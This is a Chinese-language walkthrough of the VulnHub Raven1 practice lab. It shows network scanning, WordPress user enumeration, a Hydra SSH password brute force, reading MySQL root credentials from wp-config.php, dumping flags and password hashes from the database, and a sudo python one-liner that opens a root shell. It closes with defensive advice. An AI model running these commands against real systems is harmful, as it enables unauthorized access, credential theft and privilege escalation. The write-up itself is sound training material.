Vulnhub靶场——Raven1练习
字数 1178 2025-08-19 12:41:48
Raven1 靶场渗透测试教学文档
靶机概述
Raven1 是 VulnHub 上的一个渗透测试靶机,适合初学者练习信息收集、漏洞利用和权限提升等渗透测试技能。本靶机包含多个 flag,需要通过系统性的渗透测试方法逐步获取。
环境准备
- 靶机下载地址:VulnHub Raven1
- 攻击机:Kali Linux
- 网络配置:确保靶机和攻击机在同一网络段
信息收集阶段
1. 网络扫描
使用 arp-scan 发现目标 IP:
arp-scan -l
发现目标 IP 为 192.168.78.144
2. 端口扫描
使用 Nmap 进行全端口扫描:
nmap -sT -T4 -Pn 192.168.78.144
扫描结果:
- 开放端口:22(SSH)、80(HTTP)、111(RPC)
3. Web 服务枚举
访问 HTTP 服务:
http://192.168.78.144
在 /server.html 页面源代码中发现第一个 flag:
f1ag1{b9bbcb33e11b80be759c4e844862482d}
4. 目录扫描
使用 dirsearch 扫描 Web 目录:
dirsearch -u http://192.168.78.144
发现 WordPress 目录:/wordpress
5. WordPress 扫描
使用 WPScan 扫描 WordPress:
wpscan --url http://192.168.78.144/wordpress -eu
发现两个用户名:
- steven
- michael
漏洞利用阶段
1. SSH 爆破
创建用户名字典 user.txt:
steven
michael
使用 Hydra 爆破 SSH:
hydra -l michael -P /usr/share/wordlists/rockyou.txt 192.168.78.144 ssh
成功爆破出密码:
- 用户名:michael
- 密码:michael
2. 获取系统 flag
通过 SSH 登录:
ssh michael@192.168.78.144
查找 flag 文件:
find / -name flag*
发现第二个 flag:
/var/www/flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
3. 数据库信息获取
查看 WordPress 配置文件:
cat /var/www/html/wordpress/wp-config.php
发现 MySQL 凭据:
- 用户名:root
- 密码:R@v3nSecurity
4. 数据库查询
登录 MySQL:
mysql -u root -pR@v3nSecurity
查询 WordPress 数据库:
use wordpress;
select * from wp_posts;
发现两个 flag:
flag3{afc01ab56b50591e7dccf93122770cd2}
flag4{715dea6c055b9fe3337544932f2941ce}
查询用户表:
select * from wp_users;
获取用户密码哈希(需要解密)
权限提升阶段
1. 解密用户密码
使用在线工具或 John the Ripper 解密 steven 的密码哈希,得到明文密码:
pink84
2. 切换用户
切换到 steven 用户:
su steven
密码:pink84
3. 检查 sudo 权限
sudo -l
发现 steven 可以以 root 权限执行 Python
4. 利用 Python 提权
sudo python -c 'import os; os.system("/bin/sh")'
成功获取 root shell
总结
通过本次渗透测试,我们:
- 通过信息收集发现 WordPress 和用户信息
- 爆破 SSH 获取初始立足点
- 从 WordPress 配置文件中获取数据库凭据
- 查询数据库获取更多 flag 和用户凭据
- 通过 sudo 权限滥用实现权限提升
关键点备忘
- 不要忽略页面源代码中的隐藏信息
- 配置文件往往包含敏感信息
- 数据库是获取凭证的重要来源
- 定期检查 sudo 权限是提权的关键
- 密码复用是常见的安全问题
防御建议
- 使用强密码策略
- 限制 SSH 登录尝试
- 保护配置文件权限
- 定期审计 sudo 权限
- 避免密码复用